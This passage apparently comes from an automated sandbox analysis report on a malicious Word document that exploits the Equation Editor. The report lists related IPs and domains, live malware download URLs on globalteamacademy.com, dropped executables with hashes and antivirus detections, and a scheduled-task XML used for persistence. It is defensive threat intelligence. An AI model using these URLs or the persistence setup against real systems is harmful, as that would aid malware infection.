                                          09:19:06API Interceptor1291x Sleep call for process: missijng.exe modified
                                          09:19:08API Interceptor1x Sleep call for process: schtasks.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          43.252.37.193PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                          • globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
                                          New ORDER 092134..docGet hashmaliciousBrowse
                                          • globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
                                          RFQ A50924-E001.docGet hashmaliciousBrowse
                                          • globalteamacademy.com/epl/zi/SAM.exe
                                          quotation085312456.docGet hashmaliciousBrowse
                                          • globalteamacademy.com/epl/pll/PALLS.exe
                                          STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                          • globalteamacademy.com/epl/ja/JASP.exe
                                          198.54.122.60PROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                            New ORDER 092134..docGet hashmaliciousBrowse
                                              i0K5YoZXLi.exeGet hashmaliciousBrowse
                                                STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                  DHL............097HFRGJLK0877IKF.xlsxGet hashmaliciousBrowse
                                                    POinv00393.exeGet hashmaliciousBrowse
                                                      DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                        Pending Orders Statement -40064778.docGet hashmaliciousBrowse
                                                          documenting.docGet hashmaliciousBrowse
                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                              74725794.exeGet hashmaliciousBrowse
                                                                pickup receipt,DOC.exeGet hashmaliciousBrowse
                                                                  Pi_74725794.exeGet hashmaliciousBrowse
                                                                    74725794.exeGet hashmaliciousBrowse
                                                                      New FedEx paper work review.exeGet hashmaliciousBrowse
                                                                        New paper work document attached.exeGet hashmaliciousBrowse
                                                                          DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                                            PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                                                gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  globalteamacademy.comPROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  New ORDER 092134..docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  RFQ A50924-E001.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  quotation085312456.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  mail.privateemail.comPROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  New ORDER 092134..docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  i0K5YoZXLi.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  ORDER-876545.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  DHL............097HFRGJLK0877IKF.xlsxGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  QuotationTXCtyres.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  POinv00393.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Pending Orders Statement -40064778.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  documenting.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  74725794.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  pickup receipt,DOC.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60

                                                                                  ASN

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  NAMECHEAP-NETUSPROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  New ORDER 092134..docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  PO#4503527426.xlsxGet hashmaliciousBrowse
                                                                                  • 198.54.117.216
                                                                                  SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.212
                                                                                  i0K5YoZXLi.exeGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  LbxEsmtt9T.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.210
                                                                                  IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                                                  • 198.187.29.67
                                                                                  KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.212
                                                                                  STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  Nre Order.exeGet hashmaliciousBrowse
                                                                                  • 185.61.154.56
                                                                                  DHL............097HFRGJLK0877IKF.xlsxGet hashmaliciousBrowse
                                                                                  • 198.54.122.60
                                                                                  DHL Delivery.exeGet hashmaliciousBrowse
                                                                                  • 198.54.114.191
                                                                                  ZoZPSenk67.exeGet hashmaliciousBrowse
                                                                                  • 199.188.200.97
                                                                                  swift copy.exeGet hashmaliciousBrowse
                                                                                  • 198.54.126.106
                                                                                  M0uy4pgQzd.exeGet hashmaliciousBrowse
                                                                                  • 198.54.117.211
                                                                                  file OEM file.xlsxGet hashmaliciousBrowse
                                                                                  • 198.54.126.106
                                                                                  WaybillDoc_6848889025.xlsxGet hashmaliciousBrowse
                                                                                  • 198.54.126.106
                                                                                  SOA 2.docGet hashmaliciousBrowse
                                                                                  • 198.54.117.216
                                                                                  PO_Invoices_pdf.exeGet hashmaliciousBrowse
                                                                                  • 199.193.7.228
                                                                                  winlog.exeGet hashmaliciousBrowse
                                                                                  • 162.0.229.112
                                                                                  NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloudPROFORMA INVOICE-09765434.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  New ORDER 092134..docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  RFQ A50924-E001.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  quotation085312456.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  STEELWORKS RFQ-38166.docGet hashmaliciousBrowse
                                                                                  • 43.252.37.193
                                                                                  PAYMENT 25SW Aug-06-2018.docGet hashmaliciousBrowse
                                                                                  • 182.239.42.250

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.078657124509345
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kK7NFHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:RFu3kPlE99SNxAhUeo+aKt
                                                                                  MD5:274093D6595CD22DC73ABB6206C4B513
                                                                                  SHA1:F25C7E5B5AD998B5881736D81A9FE944638B6C08
                                                                                  SHA-256:3101562B6B325FFA211E1B020267623693A3F855FD3BE557B8679C0AB852BBA1
                                                                                  SHA-512:6EDD92F89E0753614A61E271CFD6B3728EA682B816EF0FF04DC4257CD79EAE181B1EE205D5BC99EEAFD25C4DC406F8D87EC4CDF9DCF25075FDBD0D3150BDF156
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: p...... ........V..(...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exe
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:downloaded
                                                                                  Size (bytes):1076224
                                                                                  Entropy (8bit):7.527876278207655
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Yf3OBYQSdGipAhZO6cI7yKf0O1McNrf5rWY3FUIdUse3ZEO9M7EUbOFJnL2PFIqj:Yf3OBYQSoewO7ur3Flq+nzb+oeq68
                                                                                  MD5:75E7F84FC3FB447922B02A1289A4D827
                                                                                  SHA1:E97BCF8D8DC4351A321F791D7E10DEECFAF679B7
                                                                                  SHA-256:64C11A7BC8EEFC870FF4063C92701C5304AAFA05813441856428F7516E4670DD
                                                                                  SHA-512:B6D03C345F00A7860A6046CB8273C4FE2C42FC0E6B2CA81B834B26F53BB649F3A4EE91FB264A06BBBAFDAD90621BB60415627818FCD209A1AE4E07CC2C996E88
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 27%
                                                                                  Reputation:low
                                                                                  IE Cache URL:http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6+.`..............P..P...........n... ........@.. ....................................@..................................m..O.................................................................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............j..............@..B.................m......H............j...............{...........................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....o....(4....*&..(5....*.s6........s7........s8........s9........s:........*....0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AF938F5-0AD7-4277-AC73-D394204FA723}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1024
                                                                                  Entropy (8bit):0.9261682520195451
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:OllvfXNNgREqAWlgFJkSDlll8vlw6FwQFrB:OlNHk5uFJn7uvq6KQZB
                                                                                  MD5:4B392863A5071ABFBA31BAE7FDACDA36
                                                                                  SHA1:6D90A70BD8BA923C6925A191C591518CC42151EB
                                                                                  SHA-256:CBCA10BD6C5D15CECD0F4609A857AA51FE87D7790C0615268C80DB3C7ED4AB11
                                                                                  SHA-512:A9F4F9AA64BAB3E656771F492D98977585878D886C697A6E87B2EAA380C2EA1D7C820A00DAB01E9E219D2E6BB27C510327C543F704DA4DD5112A5F197D4B1DA3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: _.0.3.4.6.1.3.3.6.5.1.\.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .jm:.c...CJ..OJ..QJ..U..^J..aJ.
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B68C113C-9B88-4A7A-BAAD-75353DCC52EC}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1024
                                                                                  Entropy (8bit):0.05390218305374581
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\Cab3150.tmp
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\Local\Temp\Tar3151.tmp
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):152788
                                                                                  Entropy (8bit):6.316654432555028
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                  C:\Users\user\AppData\Local\Temp\tmp45B8.tmp
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1620
                                                                                  Entropy (8bit):5.14862350431686
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB4tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3Q
                                                                                  MD5:D7D38C238A9AADEFDEA3805C2E188434
                                                                                  SHA1:5B511235D9F24E18C86F6B61A8E1AA6A1831AF72
                                                                                  SHA-256:E732F808BD815A69446C061B4008B7F24CE17A0FF7D6927D408CC3840CEBA586
                                                                                  SHA-512:248FFCB082A4E0B4D1F18421C0896EDAED71924012EA7F67F51D29AC04B7205F989EE9020813B9C09B53030D1F02568A1971452DC59EA0681BF14D339BE916A5
                                                                                  Malicious:true
                                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Quotation-20441.LNK
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Thu Feb 4 16:18:36 2021, length=651883, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2078
                                                                                  Entropy (8bit):4.557532452544892
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8d1n/XT0jk1f7JpOHTQh2d1n/XT0jk1f7JpOHTQ/:8dZ/Xojk97TOHTQh2dZ/Xojk97TOHTQ/
                                                                                  MD5:2B172B5483B05F9C5841F4D8F0FA800D
                                                                                  SHA1:19BDA466FA910F01A7F9EB8B6EBFD512A32FBFB9
                                                                                  SHA-256:9C8D4BD8E8146D817002569BA733DE7B02A49E26870310451E4EC162E2EBB4DC
                                                                                  SHA-512:26CE1D2BA6FE4EA74003522568A0395C0CF647CA8D97F11BDC1C2264BF0014A2CFDD90CDBB18A5856F8904B009B78389BB004B35EFD42321FBFDC3229EB8ABD6
                                                                                  Malicious:false
                                                                                  Preview: L..................F.... .......{......{...G......k............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.k...DRS. .QUOTAT~1.DOC..T.......Q.y.Q.y*...8.....................Q.u.o.t.a.t.i.o.n.-.2.0.4.4.1...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\Quotation-20441.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.u.o.t.a.t.i.o.n.-.2.0.4.4.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9F.C.........
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):83
                                                                                  Entropy (8bit):4.404411196527893
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:M1EdBlsQKfdBlmX1EdBlv:MaBaB1B1
                                                                                  MD5:C4FD0FD54392C67D4E0D2CDB909D836E
                                                                                  SHA1:795373302D0F3BB6F9DEB0956597AFC74456B1D9
                                                                                  SHA-256:BCBE48D95277FD5E5D207A29931298E0E9304DDC0C8ACB08DB0F4BFA42093AC7
                                                                                  SHA-512:C97A27D2F64DBA29071B79A7742F64AC11FA83AE012CB65AD0FC17FEE8860EA3FEDBF2B6ECAD9A55E2EE41CC036079B4B1557B20A02508019AF6CB991DCC60F4
                                                                                  Malicious:false
                                                                                  Preview: [doc]..Quotation-20441.LNK=0..Quotation-20441.LNK=0..[doc]..Quotation-20441.LNK=0..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                  MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                  SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                  SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                  SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                  C:\Users\user\AppData\Roaming\ROGxuzog.exe
                                                                                  Process:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1076224
                                                                                  Entropy (8bit):7.527876278207655
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Yf3OBYQSdGipAhZO6cI7yKf0O1McNrf5rWY3FUIdUse3ZEO9M7EUbOFJnL2PFIqj:Yf3OBYQSoewO7ur3Flq+nzb+oeq68
                                                                                  MD5:75E7F84FC3FB447922B02A1289A4D827
                                                                                  SHA1:E97BCF8D8DC4351A321F791D7E10DEECFAF679B7
                                                                                  SHA-256:64C11A7BC8EEFC870FF4063C92701C5304AAFA05813441856428F7516E4670DD
                                                                                  SHA-512:B6D03C345F00A7860A6046CB8273C4FE2C42FC0E6B2CA81B834B26F53BB649F3A4EE91FB264A06BBBAFDAD90621BB60415627818FCD209A1AE4E07CC2C996E88
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 27%
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6+.`..............P..P...........n... ........@.. ....................................@..................................m..O.................................................................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............j..............@..B.................m......H............j...............{...........................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....o....(4....*&..(5....*.s6........s7........s8........s9........s:........*....0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....
                                                                                  C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1076224
                                                                                  Entropy (8bit):7.527876278207655
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Yf3OBYQSdGipAhZO6cI7yKf0O1McNrf5rWY3FUIdUse3ZEO9M7EUbOFJnL2PFIqj:Yf3OBYQSoewO7ur3Flq+nzb+oeq68
                                                                                  MD5:75E7F84FC3FB447922B02A1289A4D827
                                                                                  SHA1:E97BCF8D8DC4351A321F791D7E10DEECFAF679B7
                                                                                  SHA-256:64C11A7BC8EEFC870FF4063C92701C5304AAFA05813441856428F7516E4670DD
